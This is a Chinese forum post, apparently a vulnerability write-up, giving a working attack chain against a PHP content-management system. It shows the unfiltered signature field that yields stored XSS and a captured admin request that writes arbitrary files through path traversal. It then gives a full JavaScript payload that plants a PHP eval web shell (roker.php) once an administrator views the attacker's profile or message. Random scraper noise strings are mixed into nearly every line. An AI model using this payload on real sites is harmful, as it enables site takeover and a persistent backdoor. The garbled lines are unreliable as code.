这个CMS以前有人发了个getshell,当时是后台验证文件的问题。
官网已经修补了,所以重新下了源码。
因为后台登入还需要认证码,所以注入就没看了。
存在XSS。
漏洞文件 user/member/skin_edit.php
5 k" m+ h2 e) c1 }本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
* u5 x! v8 S7 ?6 \! ^5 G6 H5 t 7 `7 J ^$ n+ W/ \* G+ h5 b7 Q
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
9 B1 l6 A* R" p3 q$ l # @% g; ~& K7 H0 W* p- J
</textarea></td></tr>, P$ C7 b3 d8 ]6 ]# U E! ~/ j
8 y+ K" F) S, O1 O$ U
user/do.php
7 g- i7 w T7 _/ b3 |, H& ~
H f: ~7 ~' ]0 \9 C2 A) Q
# J8 ^8 I- [% Q1 O. G6 Mif($op=='zl'){ //资料9 s, I/ I! P' S7 C) t- I3 d
7 b8 P9 y4 j& \: Q+ b R if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ! n) ]) X3 Q, P! E; d$ Q
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
" q" }" L: Q- n9 g! v; M
6 r+ V' X# l, s6 O! X $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 @9 j7 Y y5 R# p( c1 p
: y: ?1 k& T! G3 O. Z9 ]! e* B9 F$ w CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'$ h. V2 Q7 {: i% W) |
where CS_Name='".$cscms_name."'";
( t# R1 T7 {/ Z . g! T! e \9 }
if($db->query($sql)){
% H' u3 G( r; Y- l7 I) `
( a* }$ N, m% ` exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
0 L ?% c% t) F8 ~4 k3 E " y! ^8 }' N) ~9 _3 e
}else{
6 V; t0 K2 N) ?0 w $ i3 z4 G7 s$ X( f& D- V. J
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
6 V0 j9 T4 ^7 X/ e1 T , l3 H5 B7 B& R% l5 j9 a3 D3 v& r: [
}
5 M% W; d5 P( B$ H, n% N/ ]! R4 f
. s) }* o8 |$ U+ F, J0 p* j' ~& V5 x0 v Y. p, @7 b' G
没有过滤导致XSS产生:CS_Qianm 在 do.php 中未经任何过滤直接写入数据库,又在 skin_edit.php 中被直接 echo 输出,形成存储型XSS。
后台看了下,很奇葩的是可以写任意格式文件。
抓包如下:
# c' ^$ T: U" s, C( V
# d2 g# P, R' ]' R; d# g/ c本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
* |8 `+ U7 t4 Y- v 5 S# m! S3 D6 R( g1 G
Accept: text/html, application/xhtml+xml, */*$ z: `$ P }3 X [8 U
8 }. d3 H$ o- iReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
2 L- |- x2 A: N" i; \0 v" w3 l
" x' h1 X' i* K- UAccept-Language: zh-CN3 r0 s0 l9 f+ j, p* B3 w
* o% Z7 ]. M+ u( E1 j6 R' d
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' G" K. [) m# C- F
& ~5 l6 U6 g' ]& CContent-Type: application/x-www-form-urlencoded2 @2 h+ G" q8 X
1 ~+ A- C2 o2 ~- y- _
Accept-Encoding: gzip, deflate
x) _9 z! p7 F! R# ?: o9 P" b . f4 Y K q' k+ f1 b0 s
Host: 127.0.0.1
* ~! I& l d& ]: { . D: m% i ?! c8 m3 \( E3 ^4 [" X; [, X
Content-Length: 38
2 [! A% L8 T9 J8 r2 p$ {: _
3 Y& ~3 N0 _4 w1 D% q) r+ uDNT: 1
% d% m6 W; y$ i, x* n 0 h' ]% M$ ?+ Q7 z: J: p6 |
Connection: Keep-Alive- Z9 t, T5 I( C7 `
0 ~% S3 a0 V/ N) k4 x$ ?3 ~Cache-Control: no-cache* S& E2 o( W$ g+ y
7 G( @9 j7 R4 BCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; K. S( x: @! w% R) S8 v
8 E, [7 S% s n! u6 Z
" K0 a0 B0 q3 s3 U+ @4 U! T" Iname=aaa.php&content=%3Cs%3E%3Ca%25%3E' l6 g! g8 O' d( C' L; M/ U9 H' `+ Z
& Q" p1 v i: S8 V+ t1 a1 o1 e6 J0 ~$ G3 y
于是构造JS如下。
- ]" r& s* a0 x' z/ {) J: E4 Y) j. C
本帖隐藏的内容<script>
5 q' M, w0 y: u5 V( S" J8 ~thisTHost = top.location.hostname;$ R1 J2 z4 O1 `
9 {$ ~* }+ d9 FthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";& E. D8 x( q( T
8 o% H+ }. |8 ?function PostSubmit(url, data, msg) {
2 R' W; }! [8 T7 ~* Z var postUrl = url;! \# o5 m* t' w, Y: x
- G2 @5 {5 S+ |2 Q j
var postData = data;
6 ]# x5 B3 a" L; M var msgData = msg;
: u% d( U0 G0 M2 l9 G var ExportForm = document.createElement("FORM");
& y+ Y- N5 r3 d" E! J" d9 s4 S document.body.appendChild(ExportForm); $ @- |9 F( {: Y
ExportForm.method = "POST"; 3 z9 G1 X0 }2 A4 d2 x+ l- x- n
var newElement = document.createElement("input");
; |0 y$ l2 e! j3 |1 e newElement.setAttribute("name", "name"); 8 [# l4 u, e* N8 o M+ L
newElement.setAttribute("type", "hidden"); ; H! r5 [ f$ k% r2 S
var newElement2 = document.createElement("input"); ' m8 X; I. e& F) d' y% `
newElement2.setAttribute("name", "content"); 4 O6 u2 V: `$ G4 R
newElement2.setAttribute("type", "hidden"); % o' f/ e& l( E2 Q" Y2 G+ h y
ExportForm.appendChild(newElement);
+ C8 ^: |5 o% `5 L0 w6 P% s; e ExportForm.appendChild(newElement2); % I y! g) l- |% K5 B) U; e
newElement.value = postData; . r" |- i6 A9 U. E' X9 u1 q) v2 [: R
newElement2.value = msgData;
- j& u9 k3 t3 X6 V" h$ |7 ~. N4 y ExportForm.action = postUrl; q) Z2 |% j3 \% P
ExportForm.submit();
. ^5 D4 f, W6 Y( x0 r$ Z$ y};
( b8 x; J8 d5 ?9 ?6 t ! ~- W7 A' w$ P" {
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");# @7 `4 X( J3 S" U, z
# [: t. d( o$ e0 I/ y/ \. X# |# h
</script>. H$ M0 f0 ~# H6 f8 \5 u( `6 n$ W
( |9 ^: B; W, E, _. ]5 b% K8 ?, U3 e
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上述内容。
用你的账号给管理写个私信,或者让他访问你的主页 http://127.0.0.1/home/?uid=2(uid自己改)。
就会在 skins\index\html\ 目录下生成 roker.php 一句话。